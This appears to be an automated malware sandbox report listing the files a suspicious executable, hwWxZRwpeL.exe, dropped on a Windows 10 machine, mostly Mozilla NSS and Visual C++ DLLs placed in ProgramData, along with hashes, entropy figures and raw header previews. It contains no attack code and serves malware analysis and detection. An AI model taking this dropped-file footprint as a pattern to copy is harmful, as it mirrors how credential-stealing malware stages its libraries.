                                                                                                                                                                                                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.5.5.2.<./.P.i.

                                                                                                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D36.tmp.xml

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):4579
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.468673565148165
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:cvIwWl8zseJg77aI9BmWpW8VYCMYm8M4JIfkLfEraFJK+q8bSpgEaAvMQId:uIjfUI77n7VjJJzYrsKDG1AvMQId
                                                                                                                                                                                                                                                                                                                                MD5:7E30A65A33FC7D55031B803F2B487A27
                                                                                                                                                                                                                                                                                                                                SHA1:82AB764D0BAEA88A1907FF11E3CEE48A77D4DC87
                                                                                                                                                                                                                                                                                                                                SHA-256:EB7D3A2F1F1EB182D98AEEF8AD5C41BFA7379F32C70DF0BB8D99CCBE6A859E73
                                                                                                                                                                                                                                                                                                                                SHA-512:106014EC8E0C411A06DA171629F492449C62134E17960678E1E933C4407E7C3EC9A48808D145FD6FE470ABD36C06F608DAFB687FAF5F6ABB95A051DCDAA8559B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="563765" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                                                                                                C:\ProgramData\chrome.dll

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):692736
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.304379785339226
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:Kk5nGNLFzxC+gej5yNcTN+pt+tLK75PL2rn65hYVKKuKOvy/j3t:KMGNL/geFyNcTN+jv75TQn652VBuNyb
                                                                                                                                                                                                                                                                                                                                MD5:EDA18948A989176F4EEBB175CE806255
                                                                                                                                                                                                                                                                                                                                SHA1:FF22A3D5F5FB705137F233C36622C79EAB995897
                                                                                                                                                                                                                                                                                                                                SHA-256:81A4F37C5495800B7CC46AEA6535D9180DADB5C151DB6F1FD1968D1CD8C1EEB4
                                                                                                                                                                                                                                                                                                                                SHA-512:160ED9990C37A4753FC0F5111C94414568654AFBEDC05308308197DF2A99594F2D5D8FE511FD2279543A869ED20248E603D88A0B9B8FB119E8E6131B0C52FF85
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                • Filename: KTvTgKJSyw.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                • Filename: W9f3Fx6sL4.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s,.>7M.m7M.m7M.m|5.l<M.m|5.l.M.m|5.l#M.m'..l"M.m'..l'M.m'..l.M.m|5.l:M.m7M.m.M.m7M.mlM.m...l6M.m...l6M.mRich7M.m........................PE..L......g.........."!...)............P.....................................................@..........................\..l...<].................................. 8...(..T....................(......@'..@............................................text............................... ..`.rdata..zV.......X..................@..@.data...T....p.......N..............@....reloc.. 8.......:...X..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\ProgramData\freebl3.dll

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):685392
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                                                                                MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                                                                                SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                                                                                SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                                                                                SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):608080
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                                                                                MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                                                                                SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                                                                                SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                                                                                SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\ProgramData\msvcp140.dll

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):450024
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                                                                                MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                                                                                SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                                                                                SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                                                                                SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\ProgramData\nss3.dll

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2046288
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                                                                                MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                                                                                                SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                                                                                SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                                                                                SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\ProgramData\softokn3.dll

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):257872
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                                                                                                MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                                                                                                SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                                                                                                SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                                                                                                SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\ProgramData\vcruntime140.dll

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):80880
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                                                                                MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                                                                                SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                                                                                SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                                                                                SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\7ff1077e-2baa-4bc2-960a-51cbdb7a30dc.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):45786
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.088099445597512
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:mMkbJrT8IeQcrQgx9o92cu9hDO6vP6OwaO3B22vdEF0dYcpYL+CAoWGoup1Xl3jU:mMk1rT8HR9o9T6QaOacp1RoWhu3VlXrm
                                                                                                                                                                                                                                                                                                                                MD5:C89A854C010640EEB25A56BB602CF12B
                                                                                                                                                                                                                                                                                                                                SHA1:2F9D20B68543E71CB533867985517315C5C4E79A
                                                                                                                                                                                                                                                                                                                                SHA-256:F66FE5068003C0B52D0F9927FB84959BD210C13E138A01EC83A404AA81314B5D
                                                                                                                                                                                                                                                                                                                                SHA-512:9BD0B3374EE7F4C4EC0B7AA8A39E4F78562EDDB735B1DFD4700E54E1D45E37FDEBDF783BDF8B7CEBD891EA66D4FBAE140F887F1EDD63697378C22B5DAD1603F5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\82361c59-9442-4512-9372-030328808a63.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):45863
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.088026085991129
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:mMkbJrT8IeQcrQge9o92cu9hDO6vP6OwaO3122vdEF0dYcpYL+CAoWGoup1Xl3jU:mMk1rT8H+9o9T6QaOWcp1RoWhu3VlXrm
                                                                                                                                                                                                                                                                                                                                MD5:36F6356D8DF0DD539B6B7DEB32B214E4
                                                                                                                                                                                                                                                                                                                                SHA1:9FC43A6E26DDCD087D0D69B6614CE00FB89FA2DF
                                                                                                                                                                                                                                                                                                                                SHA-256:E3AD4DA3CB5D5F1AF67F61BD45F73A79A2CC3DB1C90DB08849ED79A5117C9AC5
                                                                                                                                                                                                                                                                                                                                SHA-512:71F1809845A6A5230C3B7A1713FF90D521FFFDF0B30973F81B8A8DB7C1DCF2C5BA090C5F5A0F45AF428FA927D9E1F78831234EC2D01CFA854C36AD49A966E302
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):107893
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.640135461872496
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7x:fwUQC5VwBIiElEd2K57P7x
                                                                                                                                                                                                                                                                                                                                MD5:19DB9AF7D3FDB56FDD8CB17DB154752C
                                                                                                                                                                                                                                                                                                                                SHA1:FC38FEED3175DB5F9C8C17DA55B594B7875D0F92
                                                                                                                                                                                                                                                                                                                                SHA-256:9033818BAA03976518D89725A48837BDB1B8876927163DAE2ED48A2226AA6ABE
                                                                                                                                                                                                                                                                                                                                SHA-512:5A32D07505128BF3DB8A1D2E51F43B502C7270CC3F656126981597DB2676C3DA465C34D1A2DDB965C6F79C9F809824DCA794014D77B53EDB948602DEB8575D6C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\d1b0afc4-3965-4375-bc7d-40ccbc9db1b1.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):107893
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.640135461872496
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7x:fwUQC5VwBIiElEd2K57P7x
                                                                                                                                                                                                                                                                                                                                MD5:19DB9AF7D3FDB56FDD8CB17DB154752C
                                                                                                                                                                                                                                                                                                                                SHA1:FC38FEED3175DB5F9C8C17DA55B594B7875D0F92
                                                                                                                                                                                                                                                                                                                                SHA-256:9033818BAA03976518D89725A48837BDB1B8876927163DAE2ED48A2226AA6ABE
                                                                                                                                                                                                                                                                                                                                SHA-512:5A32D07505128BF3DB8A1D2E51F43B502C7270CC3F656126981597DB2676C3DA465C34D1A2DDB965C6F79C9F809824DCA794014D77B53EDB948602DEB8575D6C
                                                                                                                                                                                                                                                                                                                                Malicious:false
